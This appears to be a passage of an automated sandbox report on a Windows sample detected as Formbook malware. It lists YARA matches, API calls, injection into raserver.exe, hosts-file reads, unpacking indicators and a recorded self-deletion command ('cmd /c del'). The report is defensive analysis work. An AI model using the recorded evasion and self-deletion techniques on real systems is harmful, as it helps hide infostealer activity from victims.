          Source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_004181D0 NtCreateFile,2_2_004181D0
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00418280 NtReadFile,2_2_00418280
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00418300 NtClose,2_2_00418300
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_004183B0 NtAllocateVirtualMemory,2_2_004183B0
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00418222 NtCreateFile,2_2_00418222
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_004183AA NtAllocateVirtualMemory,2_2_004183AA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99840 NtDelayExecution,LdrInitializeThunk,13_2_04C99840
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99860 NtQuerySystemInformation,LdrInitializeThunk,13_2_04C99860
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C995D0 NtClose,LdrInitializeThunk,13_2_04C995D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C999A0 NtCreateSection,LdrInitializeThunk,13_2_04C999A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99540 NtReadFile,LdrInitializeThunk,13_2_04C99540
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99910 NtAdjustPrivilegesToken,LdrInitializeThunk,13_2_04C99910
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C996D0 NtCreateKey,LdrInitializeThunk,13_2_04C996D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C996E0 NtFreeVirtualMemory,LdrInitializeThunk,13_2_04C996E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99A50 NtCreateFile,LdrInitializeThunk,13_2_04C99A50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99650 NtQueryValueKey,LdrInitializeThunk,13_2_04C99650
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99660 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_04C99660
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99FE0 NtCreateMutant,LdrInitializeThunk,13_2_04C99FE0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99780 NtMapViewOfSection,LdrInitializeThunk,13_2_04C99780
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99710 NtQueryInformationToken,LdrInitializeThunk,13_2_04C99710
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C998F0 NtReadVirtualMemory,13_2_04C998F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C998A0 NtWriteVirtualMemory,13_2_04C998A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C9B040 NtSuspendThread,13_2_04C9B040
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99820 NtEnumerateKey,13_2_04C99820
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C999D0 NtCreateProcessEx,13_2_04C999D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C995F0 NtQueryInformationFile,13_2_04C995F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99950 NtQueueApcThread,13_2_04C99950
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99560 NtWriteFile,13_2_04C99560
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99520 NtWaitForSingleObject,13_2_04C99520
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C9AD30 NtSetContextThread,13_2_04C9AD30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99A80 NtOpenDirectoryObject,13_2_04C99A80
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99670 NtQueryInformationProcess,13_2_04C99670
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99A00 NtProtectVirtualMemory,13_2_04C99A00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99610 NtEnumerateValueKey,13_2_04C99610
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99A10 NtQuerySection,13_2_04C99A10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99A20 NtResumeThread,13_2_04C99A20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C997A0 NtUnmapViewOfSection,13_2_04C997A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C9A3B0 NtGetContextThread,13_2_04C9A3B0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99760 NtOpenProcess,13_2_04C99760
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99770 NtSetInformationFile,13_2_04C99770
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C9A770 NtOpenThread,13_2_04C9A770
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99B00 NtSetValueKey,13_2_04C99B00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C9A710 NtOpenProcessToken,13_2_04C9A710
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C99730 NtQueryVirtualMemory,13_2_04C99730
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B81D0 NtCreateFile,13_2_009B81D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B8280 NtReadFile,13_2_009B8280
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B83B0 NtAllocateVirtualMemory,13_2_009B83B0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B8300 NtClose,13_2_009B8300
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B8222 NtCreateFile,13_2_009B8222
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B83AA NtAllocateVirtualMemory,13_2_009B83AA
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_0040102E2_2_0040102E
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_0041B8FB2_2_0041B8FB
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00408C6C2_2_00408C6C
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00408C702_2_00408C70
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_0041B57A2_2_0041B57A
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00402D882_2_00402D88
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_0041C58A2_2_0041C58A
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6B09013_2_04C6B090
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D1100213_2_04D11002
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6841F13_2_04C6841F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C6D5E013_2_04C6D5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D21D5513_2_04D21D55
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C5F90013_2_04C5F900
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C50D2013_2_04C50D20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7412013_2_04C74120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C76E3013_2_04C76E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8EBB013_2_04C8EBB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009BB8FB13_2_009BB8FB
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009A8C7013_2_009A8C70
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009A8C6C13_2_009A8C6C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009A2D9013_2_009A2D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009BC58A13_2_009BC58A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009A2D8813_2_009A2D88
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009BB57A13_2_009BB57A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009A2FB013_2_009A2FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04C5B150 appears 32 times
          Source: pMbPS8nCm1.exe, 00000001.00000003.243940877.0000000002406000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs pMbPS8nCm1.exe
          Source: pMbPS8nCm1.exe, 00000002.00000002.307872984.0000000000CBF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs pMbPS8nCm1.exe
          Source: pMbPS8nCm1.exe, 00000002.00000002.308207312.0000000000D89000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameraserver.exej% vs pMbPS8nCm1.exe
          Source: pMbPS8nCm1.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@13/5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2196:120:WilError_01
          Source: pMbPS8nCm1.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: pMbPS8nCm1.exeVirustotal: Detection: 26%
          Source: pMbPS8nCm1.exeReversingLabs: Detection: 41%
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeFile read: C:\Users\user\Desktop\pMbPS8nCm1.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\pMbPS8nCm1.exe 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeProcess created: C:\Users\user\Desktop\pMbPS8nCm1.exe 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeProcess created: C:\Users\user\Desktop\pMbPS8nCm1.exe 'C:\Users\user\Desktop\pMbPS8nCm1.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pMbPS8nCm1.exe'Jump to behavior
          Source: Binary string: wntdll.pdbUGP source: pMbPS8nCm1.exe, 00000001.00000003.245067685.0000000002480000.00000004.00000001.sdmp, pMbPS8nCm1.exe, 00000002.00000002.306527493.0000000000A10000.00000040.00000001.sdmp, raserver.exe, 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: pMbPS8nCm1.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: pMbPS8nCm1.exe, 00000002.00000002.308172933.0000000000D70000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdbGCTL source: pMbPS8nCm1.exe, 00000002.00000002.308172933.0000000000D70000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeUnpacked PE file: 2.2.pMbPS8nCm1.exe.400000.0.unpack .text:ER;.rdata:R; vs .text:ER;
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_004062F6 pushfd ; ret 2_2_004062F7
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_0041B3C5 push eax; ret 2_2_0041B418
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_004153FC push eax; retf 2_2_0041540B
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_0041B47C push eax; ret 2_2_0041B482
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_0041B412 push eax; ret 2_2_0041B418
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_0041B41B push eax; ret 2_2_0041B482
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00415CE7 pushad ; ret 2_2_00415D4B
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_0041C4EE push 133511A3h; retf 2_2_0041C4F3
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00414D71 push ss; iretd 2_2_00414D72
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 2_2_00415D38 pushad ; ret 2_2_00415D4B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CAD0D1 push ecx; ret 13_2_04CAD0E4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009A62F6 pushfd ; ret 13_2_009A62F7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009BB3C5 push eax; ret 13_2_009BB418
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B53FC push eax; retf 13_2_009B540B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009BC4EE push 133511A3h; retf 13_2_009BC4F3
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B5CE7 pushad ; ret 13_2_009B5D4B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009BB41B push eax; ret 13_2_009BB482
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009BB412 push eax; ret 13_2_009BB418
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009BB47C push eax; ret 13_2_009BB482
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B5D38 pushad ; ret 13_2_009B5D4B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_009B4D71 push ss; iretd 13_2_009B4D72
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
